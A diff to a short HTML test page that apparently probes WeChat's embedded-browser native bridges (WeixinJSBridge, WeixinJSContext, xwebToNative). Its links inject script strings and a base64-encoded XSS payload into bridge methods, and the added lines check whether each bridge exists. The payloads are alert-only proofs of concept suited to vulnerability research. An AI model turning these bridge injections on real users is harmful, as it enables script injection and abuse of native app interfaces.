--- a/wei.html
+++ b/wei.html
@@ -1,10 +1,15 @@
 <body>
   <script>
     function leak() { alert(document.body.innerHTML); }
+    
+    if(typeof window.WeixinJSBridge === 'undefined') alert('WeixinJSBridge undefined');                                                          
+    if(typeof window.WeixinJSContext === 'undefined') alert('WeixinJSContext undefined');                                                          
+    if(typeof window.xwebToNative === 'undefined') alert('xwebToNative undefined');                                                          
+      
   </script>
   <a href="javascript:WeixinJSContext.allocEmpty()" onclick="leak()">CLICK</a>
   <a href="javascript:xwebToNative.onVideoError(1, '<script>alert(1);</script>')">onVideoError</a>
   <a href="javascript:xwebToNative.onVideoEnterFullscreen(false, 0, 0, 0, false, false, 0, 0, [])">onVideoEnterFullscreen</a>
   <a href="javascript:xwebToNative.onVideoGetFrame(0, 0, 'data:image/png;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==')">onVideoGetFrame</a>
-  <a href="javascript:__WeixinJSBridge.call('alert(1)', {}, 'function x() { alert(2); }')">call TEST</a>
+  <a href="javascript:WeixinJSBridge.call('alert(1)', {}, 'function x() { alert(2); }')">call TEST</a>
 </body> 
